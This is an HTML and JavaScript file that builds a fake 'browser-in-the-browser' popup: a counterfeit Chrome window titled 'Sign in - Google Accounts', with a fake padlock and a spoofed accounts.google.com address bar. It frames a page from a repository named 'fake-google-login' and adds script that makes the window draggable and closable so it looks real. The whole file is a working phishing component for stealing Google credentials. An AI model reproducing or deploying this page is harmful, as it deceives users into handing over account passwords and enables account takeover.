<!DOCTYPE html>
<html>

<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<script src="
	https://ajax.googleapis.com/ajax/libs/jquery/3.7.0/jquery.min.js"></script>
</head>
<style>
	@import url('https://fonts.googleapis.com/css2?family=Roboto&display=swap');

	html,
	body {
		width: 100%;
		height: 100%;
	}

	#title-bar {
		height: 31px;
		background-color: black;
		width: 100%;
		display: flex;
		justify-content: space-between;
		user-select: none;
	}

	#logo {
		padding-left: 5px;
		vertical-align: middle;
	}

	#logo-description {
		color: white;
		font-size: 12px;
		font-family: "Roboto";
		vertical-align: middle;
	}

	#minimize {
		color: white;
		font-size: 12px;
		padding: 9px 15px 7px 15px;
	}

	#square {
		color: white;
		font-size: 22px;
		padding: 0px 15px 5px 15px;
	}

	#exit {
		color: white;
		font-size: 15px;
		padding: 7px 17px 7px 17px;
	}

	#url-bar {
		height: 28px;
		background-color: #1b1a1a;
		width: 100%;
		display: flex;
		align-items: center;
		white-space: nowrap;
		overflow: scroll;
		text-overflow: ellipsis;
		-ms-overflow-style: none;
		scrollbar-width: none;
	}

	#url-bar::-webkit-scrollbar {
		display: none;
	}

	#ssl-padlock {
		user-select: none;
		padding-left: 8px;
		margin-right: 8px;
	}

	#domain-name {
		color: white;
		font-size: 14px;
		font-family: "Roboto";
	}

	#domain-path {
		color: #9c9898;
		font-size: 14px;
		font-family: "Roboto";
	}

	#title-bar-width {
		width: calc(100% + 2px);
		/* 2px added to allow for border on iframe */
	}

	#content {
		width: 100%;
		height: 700px;
		border: 1px solid gray;
	}

	#window {
		color: transparent;
		background-color: transparent;
		border-color: transparent;
		box-shadow: rgba(0, 0, 0, 0.35) 0px 5px 15px;
		height: 759px;
		/* title bar height + content height */
		max-width: 500px;
		margin-right: 20px;
	}
</style>

<body>
	<div id="window">
		<!-- Title bar start -->
		<div id="title-bar-width">
			<div id="title-bar">
				<div style="margin-top:5px;white-space: nowrap;overflow: hidden;">
					<img src="https://www.google.com/favicon.ico" width="16px" height="16px" id="logo">
					<span id="logo-description">Sign in - Google Accounts - Google Chrome</span>
				</div>

				<div style="width: fit-content;text-align: end;display: flex;">
					<span id="minimize">&#8212;</span>
					<span id="square">□</span>
					<span id="exit">✕</span>
				</div>
			</div>
			<div id="url-bar">
				<img src="https://img.icons8.com/external-tanah-basah-glyph-tanah-basah/48/eeeeee/external-lock-security-tanah-basah-glyph-tanah-basah-2.png" width="14px" height="14px" id="ssl-padlock">
				<span id="domain-name">https://accounts.google.com</span>
				<span
					id="domain-path">/v3/signin/identifier?opparams=%253F&dsh=S-1476296330%3A1694409909672839&access_type=offline&client_id=779010036194-lf6spugv22vvj41pqjdj4d8k2tq7o5fd.apps.googleusercontent.com&o2v=2&prompt=consent&redirect_uri=https%3A%2F%&access_type=offline&client_id=779010036194-lf6spugv22vvj41pqjdj4d8k2tq7o5fd.apps.googleusercontent.com&o2v=2&prompt=consent&redirect_uri=https%3A%2F%</span>
			</div>
		</div>
		<!-- Content start -->
		<iframe id="content" src="https://rawcdn.githack.com/artru-git/fake-google-login/1e743abd5466057d71254139bb943dfa7cf2bd01/google-login.html" frameBorder="0">

		</iframe>
	</div>
</body>
<script>
var minimize = document.getElementById("minimize");
var square = document.getElementById("square");
var exit = document.getElementById("exit");
var titleBar = document.getElementById("title-bar");

////////////////// Hover listeners //////////////////
minimize.addEventListener('mouseover', function handleMouseOver() {
  minimize.style.backgroundColor = '#272727';
  minimize.style.cursor = 'context-menu';
});

minimize.addEventListener('mouseout', function handleMouseOut() {
  minimize.style.backgroundColor = 'black';
  minimize.style.cursor = 'default';
});

square.addEventListener('mouseover', function handleMouseOver() {
  square.style.backgroundColor = '#272727';
  square.style.cursor = 'context-menu';
});

square.addEventListener('mouseout', function handleMouseOut() {
  square.style.backgroundColor = 'black';
  square.style.cursor = 'default';
});

exit.addEventListener('mouseover', function handleMouseOver() {
  exit.style.backgroundColor = 'red';
  exit.style.cursor = 'context-menu';
});

exit.addEventListener('mouseout', function handleMouseOut() {
  exit.style.backgroundColor = 'black';
  exit.style.cursor = 'default';
});

titleBar.addEventListener('mouseover', function handleMouseOver() {
  titleBar.style.cursor = 'context-menu';
});

titleBar.addEventListener('mouseout', function handleMouseOver() {
  titleBar.style.cursor = 'default';
});


//////////////// Make window draggable start ////////////////
// Make the DIV element draggable:
var draggable = $('#window');
var title = $('#title-bar');

title.on('mousedown', function(e){
	var dr = $(draggable).addClass("drag");
	height = dr.outerHeight();
	width = dr.outerWidth();
	ypos = dr.offset().top + height - e.pageY,
	xpos = dr.offset().left + width - e.pageX;
	$(document.body).on('mousemove', function(e){
		var itop = e.pageY + ypos - height;
		var ileft = e.pageX + xpos - width;
		if(dr.hasClass("drag")){
			dr.offset({top: itop,left: ileft});
		}
	}).on('mouseup', function(e){
			dr.removeClass("drag");
	});
});
//////////////// Make window draggable end ////////////////


////////////////// Onclick listeners //////////////////
// X button functionality
$("#exit").click(function(){
    $("#window").css("display", "none");
  });

// Maximize button functionality
$("#square").click(enlarge);

function enlarge(){
  if(square.classList.contains("enlarged")){
    $("#window").css("width", "40%");
    $("#title-bar-width").css('width', '100%').css('width', '+=2px');
    $("#content").css("width", "100%");
    $("#square").removeClass("enlarged");
  }
  else{
    $("#window").css("width", "70%");
    $("#title-bar-width").css('width', '100%').css('width', '+=2px');
    $("#content").css("width", "100%");
    $("#square").addClass("enlarged");
  }
}

</script>

</html>
